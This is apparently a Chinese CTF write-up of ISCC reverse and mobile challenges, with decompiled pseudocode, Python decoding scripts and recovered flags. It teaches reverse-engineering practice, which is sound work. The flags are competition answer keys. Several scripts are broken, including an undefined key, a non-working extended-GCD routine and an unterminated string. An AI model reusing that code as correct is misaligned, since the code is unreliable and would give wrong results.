temp='^<L^<LX:LX.MJ.MJ9PJ9VF$VF$T@$T];'

flag=[ord(temp[i]) for i in range(len(temp))]
print(flag)
for j in range(len(flag)):
  flag[j]^=ord(key[6+j%3])
print(1)
for j in range(len(flag)):
  flag[j]-=ord(key[3+j%3])
print(2)
for j in range(len(flag)):
  flag[j]^=ord(key[j%3])
print(3)
for i in range(len(flag)):
  print(chr(flag[i]),end='')

img

ISCC{qwqqwqwqqwereerereeroiooioiooipp}

Encode

反编译审计

img

这个是先对data xor处理之后去获取密钥然后模运算(模同),ecp如下

#coding=utf-8
def getInv(a,mod):
  y,x,d=0,0,0
  d = exgcd(a, mod, x, y)
  if d == 1:
      return (x % mod + mod) % mod
  else:
      return -1

def exgcd(a,b,x,y):
  result=0
  if b:
      result = exgcd(b, a % b, y, x)
      y -= a / b * x
  else:
      x = 1
      y = 0
      return a
  return result

key =[0]*10
key[0],key[1],key[2] =[0x7,0xb,0xd]
key[3] = key[1] * key[0]
key[4] = (key[1] - 1) * (key[0] - 1)
key[5] = getInv(key[2], key[4])
print (key)
# 输出key值

data=[0]*24

t=[0x23,0x4A,0x7,0x2B,0x1D,0x6,0x3F,0x36,0x36,0x2B,0x5,0x7,0x6,0x39,0x2,0x6,0x38,0x21,0x4B,0x1A,0x2D,0x2D,0x39,0x2]
#t='0x363F061D2B074A230x0602390607052B360x02392D2D1A4B2138'
for i in range(24):
  for j in range(1,1000):
      if t[i]==pow(j,key[2],key[3]):
          data[i] = j
          break

print (data)
# 输出key值

# bagin——flag
for i in range(len(data)):
  data[i]+=70
  data[i]^=0x3f

len_=len(data)
for i in range((len(data)%2+len(data))//2,-1,-1):
  data[len_-i-1]^=data[i]
  data[i]^=data[len_-i-1]
  data[len_-i-1]^=data[i]

flag=''
for i in range(len_):
  flag+=chr(data[i]^0xf)

print (flag)
# 输出flag

img

ISCC{PWN_ISR_EALLY_HARD}

Self-Reverse

分析一下伪代码

img

需要动态调试一下,关键代码如下

img

exp如下

t= [250,12,229,250,145,157,100,166,108,250,247,145,12,12,99,142] 
t1=[0]*16
for i in range(16):
  for j in range(0,256):
      # 爆破映射后数组,
      v34=3*j+1
      if ((v34>>8)+v34)- (v34>>8)&0xff==t[i]:
          # 只取8位 &0xff 要在最外层
          t1[i]=j
          break
      if j==127:
          print (j)
print (t1)
# 映射flag
flag=[0]*16
for i in range(16):   # 映射出flag
  flag[(i+1)%16]=t1[i^0xd]

for i in range(16):
  print(chr(flag[i]),end='')
  # 输出flag

img

ISCC{LYY/vSy0R407!YSS}

rerere

看了伪代码之后发现还是动态调试–下断点

img

调试的图失踪了,附件也召唤不到了,exp如下:

CCC=[0xD7, 0x00, 0xB5, 0x00, 0xB8, 0x00, 0x7A, 0x00, 0x47, 0x00,
0x8B, 0x00, 0x46, 0x00, 0xFF, 0x00, 0x5C, 0x00, 0xB5, 0x00,
0x04, 0x00, 0x32, 0x00, 0xE3, 0x00, 0x5A, 0x00, 0x7B, 0x00,
0x28, 0x00, 0x30, 0x00, 0x2D, 0x00, 0x5A, 0x00, 0xF3, 0x00,
0x59, 0x00, 0x59, 0x00, 0xA4, 0x00, 0x54, 0x00, 0xC8, 0x00,
0x79, 0x00, 0xA2, 0x00, 0xDC, 0x00, 0x6F, 0x00, 0x74, 0x00,
0x1F, 0x00, 0x9D]
# 遍历输出
XXX=[0x9E, 0x00, 0xE6, 0x00, 0xFB, 0x00, 0x39, 0x00, 0x3C, 0x00,
0xEA, 0x00, 0x24, 0x00, 0x9C, 0x00, 0x38, 0x00, 0xD0, 0x00,
0x62, 0x00, 0x55, 0x00, 0x8B, 0x00, 0x33, 0x00, 0x11, 0x00,
0x43, 0x00, 0x5C, 0x00, 0x40, 0x00, 0x34, 0x00, 0x9C, 0x00,
0x29, 0x00, 0x28, 0x00, 0xD6, 0x00, 0x27, 0x00, 0xBC, 0x00,
0x0C, 0x00, 0xD4, 0x00, 0xAB, 0x00, 0x17, 0x00, 0x0D, 0x00,
0x65, 0x00, 0xE0, 0x00]



flag='
#flag


for i in range(0,len(XXX),2):
  print(chr(XXX[i]^CCC[i]),end="")  
#输出flag

img

ISCC{abcdefghijklmnopqrstuvwxyz}

MOBILE

Easy Mobile

反编译头部设卡,改成35得到伪代码

img

得到关键代码

img

分析主题逻辑

public final void onCreate(Bundle paramBundle) {
  super.onCreate(paramBundle);
  setContentView(2131427356);
  this.n = (Button)findViewById(2131230808);
  this.o = (EditText)findViewById(2131230872);
  this.n.setOnClickListener(new a(this));
}
 
public final class a implements View.OnClickListener {
  public a(MainActivity this$0) {}
   
  public final void onClick(View param1View) {
    String str = this.a.o.getText().toString();
    this.a.p = str;
  }
}
}

得到flag

ISCC{W72Eb7Lf9CecO-9M87Ed-T46O4fD-bL23U0-SaaEe5C87dc2540}

Mobile Analysis

反编译得到代码,审计之后梳理主体逻辑,看到a.class

img

参数写码表,然后再看c.class

AjmBCL7DHxIMl4P5Wa=uzvt0ZTfpnoRSJNO9/QYqrsb2U1cdeEFGVXy3ghikKw68

执行得到结果。

class b的逻辑分析之后解密得到答案,最后Main activity解密排序之后得到flag

好玩的?是新语言哦

刚开始同第一个,设卡改值,逆出代码,找到重要代码ISCC

img

加密逻辑如下

for (j = 0; j < k; j++) {
  byte b = arrayOfByte1[j];
  if (97 <= b && b < 103) {
    paramInt = 1;
  } else {
    paramInt = 0;
  } 
  if (paramInt != 0) {
    paramInt = b - 87;
  } else {
    if (48 <= b && b < 58) {
      paramInt = 1;
    } else {
      paramInt = 0;
    } 
    if (paramInt != 0) {
      paramInt = b - 48;
    } else {
      paramInt = 0;
    } 
  }

理清主体逻辑

if (activityMainBinding3 == null) {
  Intrinsics.throwUninitializedPropertyAccessException("viewBinding");
  activityMainBinding1 = null;
} 
setContentView((View)activityMainBinding1.getRoot());
activityMainBinding1 = this.viewBinding;
if (activityMainBinding1 == null) {
  Intrinsics.throwUninitializedPropertyAccessException("viewBinding");
  activityMainBinding1 = activityMainBinding2;

之后得到flag(flag找不到了,这是赛后才写的这道题的wp)

解题收获

79名

image-20230125194455970

​ 首先不论是什么类型的题目,我发现最重要的还是基础,要掌握好基础知识才能在比赛过程中得心应手,其次就是脑洞要扩散点,不能太狭隘,思路要敢想!敢做!

​ 做web题目的时候更是考验基础2,这web题目都比较综合,一个题可能要打很多组合拳才能成功解出,其次还有就是多利用网络,多搜多找多学。

​ misc题目的话更是最需要扩散思维的,真的很多题目在写的时候想不到会这样,在反复思考和尝试之后成功解出来的时候真的是恍然大悟,也能感觉到自己的思路没有打开,所以在misc题目的时候要丰富想象力。

​ reverse题目和pwn题目关系比较密切,这类题型比较考察底层编程能力,同时还有就是调试,静动态,以及下断点等等基础本领,同时需要仔细地审计代码之间的逻辑关系,发现相应破绽然后写出对应脚本

​ 最后这个mobile,之前不咋涉及这方面但是通过这次比赛,真的是又学习到了很多,首先就是这个反编译出代码的能力,以及apktool,dex2jar-2.0,jd-gui-windows-1.6.6这三个软件的熟练运用,在解这方向题目的时候第一步基本都是反编译出代码,然后就是考验审计能力了,其大致后面的解法基本和reverse就相似了。

​ 通过这次iscc长达二十五天的比赛,让我学到了很多,其中mobile这个领域更是受益匪浅,同时让我见到了很多之前没有见过的题型,对于自己的技术可以说是提高了不少!

制作不易,如若感觉写的不错,欢迎打赏